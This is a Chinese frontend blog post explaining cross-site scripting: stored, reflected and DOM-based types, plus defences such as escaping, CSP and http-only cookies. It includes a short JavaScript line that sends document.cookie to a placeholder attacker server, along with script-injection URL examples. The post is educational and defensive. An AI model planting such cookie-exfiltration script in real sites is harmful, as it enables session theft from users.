XSS 攻击是什么?

最新推荐文章于 2024-04-08 10:57:05 发布
最新推荐文章于 2024-04-08 10:57:05 发布
阅读量2k 收藏 4
点赞数
文章标签: xss 前端 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fe_watermelon/article/details/126202629
版权

大家好,我是前端西瓜哥。今天我们来了解一下 XSS 攻击。

XSS 是什么?

XSS,指的是跨站脚本攻击,是 Cross-site scripting 的缩写。

全称缩写后应该是 CSS,但这样就和 层叠样式表 Cascading Style Sheets 的缩写相同了,为以示区分,改用 XSS。

XSS,本质是代码注入。通过某种方式在受攻击网站中注入一些恶意代码,当用户访问该网站去触发这段脚本。

攻击的内容大致有以下几种:

  1. 获取用户的登录凭证,拿到后登录用户账号盗取敏感信息
const img = new Image();
img.src = 攻击者的服务器_ip + document.cookie;

  1. 直接去执行一些需要权限才能进行的操作,比如给站内的某人投一票

  2. 对小网站做 Dos 攻击。所谓 Dos 就是通过短时间大量的请求让网站无法处理过来,导致网站不可用。比如你在百度首页成功注入了恶意脚本,该脚本会对某个小网站不断发送请求。这样同时大量用户打开百度首页,这请求量就就非常恐怖,小网站直接嗝屁。

XSS 分类

XSS 主要分为:存储型 XSS、反射型 XSS、以及注入型 XSS。

存储型 XSS

恶意脚本被持久化保存在数据库中。

比如在自己的个人介绍的文本内容中,使用了 <script>// 这里是一些恶意代码</script>。当用户访问攻击者的个人主页时,如果服务端渲染时就会用上这段数据,没有做特别的转义处理,渲染出来的 HTML 中就带上了这个脚本,然后执行。

反射型 XSS

有些网页会将 url 中的一些数据作为渲染的内容去渲染。

比如我们希望用户支付完订单后跳转到一个结果页,这个页面通过 url 中的 query 字符串来显示一些内容,比如http://a.com/order?message=成功 ,我们会读取 message 的值 “成功”,将这个文案渲染到页面上。

如果这个 “成功” 被黑客替换为恶意脚本,变成 http://a.com/order?message=<script>// 恶意脚本内容</script>,且网站没做转义处理,那这个恶意脚本就会被嵌入执行。

当然这个链接很奇怪,用户在常规情况下无法访问到这样的链接。

所以攻击者就需要先组装好,然后通过一些方式诱导用户去访问它,比如通过钓鱼邮件诱导点击。

DOM 型 XSS

DOM 型 XSS 和反射型有点类似,但它和后端无关,是前端的问题。

前面两种类型做的是后端渲染,即用户请求 HTML 时,在服务端拼装返回完整的 HTML 返回。

DOM 型 XSS 是服务端没有返回完整的 HTML,而是让前端做拼装渲染,如果没有做特殊处理,也会导致恶意代码注入。

XSS 防御

  1. 不要相信用户的数据;

  2. 使用转义,常见的是将 "'&<> 做转义。比如 React 对字符做了防 XSS 处理,源码在这里:https://github.com/facebook/react/blob/HEAD/packages/react-dom/src/server/escapeTextForBrowser.js#L51

  3. 如果做的是后端渲染,也记得做转义处理或过滤处理;

  4. 使用 CSP(内容安全策略)。Twitter 网站使用了这个;

  5. 对敏感 cookie 设置 http-only,让前端脚本无法获取到;

  6. cookie 的 SameSite 属性考虑调整为 Strict 或 Lax,让跨域 HTTP 请求的头字段无法自动携带 cookie;

  7. 进行敏感请求时,加个验证码校验;

  8. 控制内容输入长度(作用不大);

结尾

XSS 攻击是一种比较常见的代码注入攻击。

在平时写代码时,要注意一些数据进行渲染时,会不会导致 XSS 注入的风险,做一些必要的处理,希望这篇文章对你有一些帮助。

我是前端西瓜哥,欢迎关注我,学习更多前端知识。

前端西瓜哥
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
前端安全系列:如何防止XSS攻击
01-27
XSS、CSRF等安全问题之外,又时常遭遇网络劫持、非法调用HybridAPI等新型安全问题。当然,浏览器自身也在不断在进化和发展,不断引入 CSP、Same-SiteCookies等新技术来增强安全性,但是仍存在很多潜
前端安全XSS攻击
02-25
有人将XSS攻击分为三种,分别是:1.ReflectedXSS(基于反射的XSS攻击)2.StoredXSS(基于存储的XSS攻击)3.DOM-basedorlocalXSS(基于DOM或本地的XSS攻击)基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端...
XSS攻击
AnnieY_的博客
10-07 1564
XSS攻击指的是跨站脚本攻击,是一种代码注入攻击攻击者通过在网站注入恶意脚本,使之在用户的浏览器上运行,从而盗取用户的信息 如cookie等XSS的本质是因为网站没有对恶意代码进行过滤,与正常的代码混合在一起了,浏览器没有办法分辨哪些脚本是可信的,从而导致了恶意代码的执行攻击者可以通过这种攻击方式进行一下操作:1.获取页面的数据,如DOM,cookie,LocalStorage;2.DOS攻击,发送合理请求,占用服务器资源,从而使用户无法访问服务器;3.破坏页面结构;
oracle 模糊查询_解决XSS拦截后的数据库查询方案
weixin_39620662的博客
12-06 144
相信很多搞J2EE开发的小伙伴们都有处理过XSS攻击,这种攻击常见的为JS脚本攻击,存在这种攻击,是因为我们太相信客户端传来的参数了,所以对任何客户端传来的参数都要进行XSS过滤,这种过滤的主要处理方法就是将参数通过转义保存到数据库中,也就是将'转义成"保存到数据库中,但是这又会引发另外一个问题,就是大家都知道&是oracle中的一个特殊字符,专门用来取参数的,当oracle检测到该参数时...
XSS攻击原理及危害,说的太详细了!(值得收藏)
最新发布
周沐子
04-08 1290
防范存储型和反射型 XSS 是后端的责任DOM 型 XSS 攻击不发生在后端,是前端的责任。不同的上下文,调用不同的转义规则如 HTML 属性、HTML 文字内容、HTML 注释、跳转链接、内联 JavaScript 字符串、内联 CSS 样式表等,所需要的转义规则不一致。业务 需要选取合适的转义库,并针对不同的上下文调用不同的转义规则。
存储型XSS攻击的简单处理以及数据库查询过滤多个字段重复数据
PSY_God的博客
08-24 3247
 问题:储存型Xss是由于form表单提交的数据,前端和后台未进行过滤,将一些javascript的脚步语言存入数据库中。导致再次查询数据的时候浏览器会执行该脚步语言。如:&lt;script&gt;alert("XSS")&lt;/script&gt;。 解决方案:主要是后台的过滤,部分可绕过前端直接输入。 解决思路:采用过滤器过滤用户的输入,将一些敏感的信息直接replaceAll即可。过...
实验三:xss和SQL
qq_63568472的博客
11-22 367
网络渗透实验
6.5 XSS 获取 Cookie 攻击
qq_55202378的博客
08-20 1329
XSS获取Cookie
什么是XSS攻击
weixin_40851188的博客
04-18 1万+
网络千万条,安全第一条。网安不规范,网站都完蛋! 前端工程师接触最多的漏洞我想就是 XSS 漏洞了,然鹅并不是所有的同学对其都有一个清晰的认识。这篇文章将带领大家认清XSS攻击,以及对于XSS攻击该如何防范。 什么是XSS攻击XSS攻击指的是: 通过利用网页开发时留下的漏洞,恶意攻击者往Web页面里插入恶意 Script代码,当用户浏览时,嵌入其中Web里面的Script代码会被执...
XSS攻击详解
热门推荐
weixin_47450807的博客
03-01 3万+
本篇博客主要总结一下什么是XSS攻击,并且如何防范XSS攻击。 一、什么是XSS攻击 XSS攻击中文名称为:跨站脚本攻击XSS的重点不在于跨站,而在于脚本的攻击XSS攻击的工作原理:攻击者会在web页面中插入一些恶意的script代码。当用户浏览该页面的时候,那么嵌套在该页面的代码就会执行,因此会达到攻击用户的目的。 XSS的分类:XSS攻击最主要分为如下几类,反射型,存储型,DOM-based型。反射型和DOM-based型可以归类于非持久性XSS攻击。存储型可以归类于持久性XSS攻击。 二、反射型
登录框漏洞
Grey的博客
08-06 7155
继上次登陆框引起的血案这个文章之后,时隔一个月笔者又写了续集,呃……升华版。 0×00 文章内容结构图 0×01 信息泄露 利用泄露的信息可以大大增加我们的可测试点,从而增加我们的成功率。 1. HTML源代码 必看的肯定要属HTML源代码了,源代码里包含了下面所说的JS文件。HTML源代码会泄露很多信息,像程序员未删除的注释、敏感路径等都可能在HTML源代码中找的到,从来增加发现漏...
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
Java防止xss攻击附相关文件下载
08-25
首先说一下思路,防止这种类似于注入攻击,就是使用拦截器(Filter)处理特殊字符或过滤特殊字符 今天介绍一个方法,利用覆盖Servlet的getParameter方法达到处理特殊字符的目的来解决(防止)Xss攻击 web.xml,需要的...
什么是 XSS 攻击,如何避免?
m0_68464502的博客
06-13 319
XSS(Cross-Site Scripting)攻击是一种常见的网络安全漏洞,攻击者通过在网站或应用程序中注入恶意代码,如 JavaScript、VBScript、HTML 等,当其他用户在访问该页面时会执行这些恶意代码,达到窃取、篡改数据等恶意行为的目的。总之,避免 XSS 攻击的关键在于对用户输入进行过滤和验证,并使用 HTTPOnly Cookie 和遵循安全编程标准等技术,只有以此为基础的安全编程思路,才能有效保护应用程序的安全性。不应依赖客户端环境,应使用严格的输入验证和输出编码技术。
什么是 XSS 攻击
zheshihuahua的博客
01-19 4711
DOM 型 XSS 跟前两种 XSS 的区别:DOM 型 XSS 攻击中,取出和执⾏恶意代码由浏览器端完成,属于前端JavaScript ⾃身的安全漏洞,⽽其他两种 XSS 都属于服务端的安全漏洞。XSS 攻击指的是跨站脚本攻击,是一种代码注入攻击XSS 的本质是因为网站没有对恶意代码进行过滤,与正常的代码混合在一起了,浏览器没有办法分辨哪些脚本是可信的,从而导致了恶意代码的执行。恶意代码窃取⽤户数据并发送到攻击者的⽹站,或者冒充⽤户的⾏为,调⽤⽬标⽹站接⼝执⾏攻击者指定的操作。
什么是XXS攻击
qq_37711049的博客
02-20 236
当其他用户浏览该网站时,该段html代码会自动执行,从而达到攻击的目的,把精心构造好的恶意脚本包装在URL参数中,再将这个URL发布到网上,如盗取用户的Cookie,破坏页面结构,重定向到其他网站等。从而导致每个正常访问到的用户都会遭到这段XSS脚本的攻击。Cross-site script,跨站脚本攻击。对一个页面的URL中的某个参数做文章,对客户端攻击的脚本植入到服务器上,骗取用户访问,从而进行攻击
xss攻击(一)
wwwwxiaobai的博客
06-11 330
xss攻击 前言: xss也是web安全中的一种常见的攻击方式,想要学习,就先要了解是什么。 xss攻击的定义: XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 只是看概念是没意思的,要想...
XSS攻击---不得不防的网站安全漏洞
qq_37502042的博客
08-19 529
日常vlog。近期公司参与了一次网络安全大检查。手上有个项目被检测出存在XSS攻击漏洞,解决漏洞的同时,借此机会分享一下关于XSS攻击的一些学习总结。
xss攻击的原理是什么?
12-14
XSS(跨站脚本攻击)是一种常见的Web攻击攻击者通过注入恶意脚本来攻击网站的用户。攻击者可以在受害者的浏览器中执行恶意脚本,从而窃取用户的信息,例如cookie、会话令牌和其他敏感数据。攻击者可以通过各种方式...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值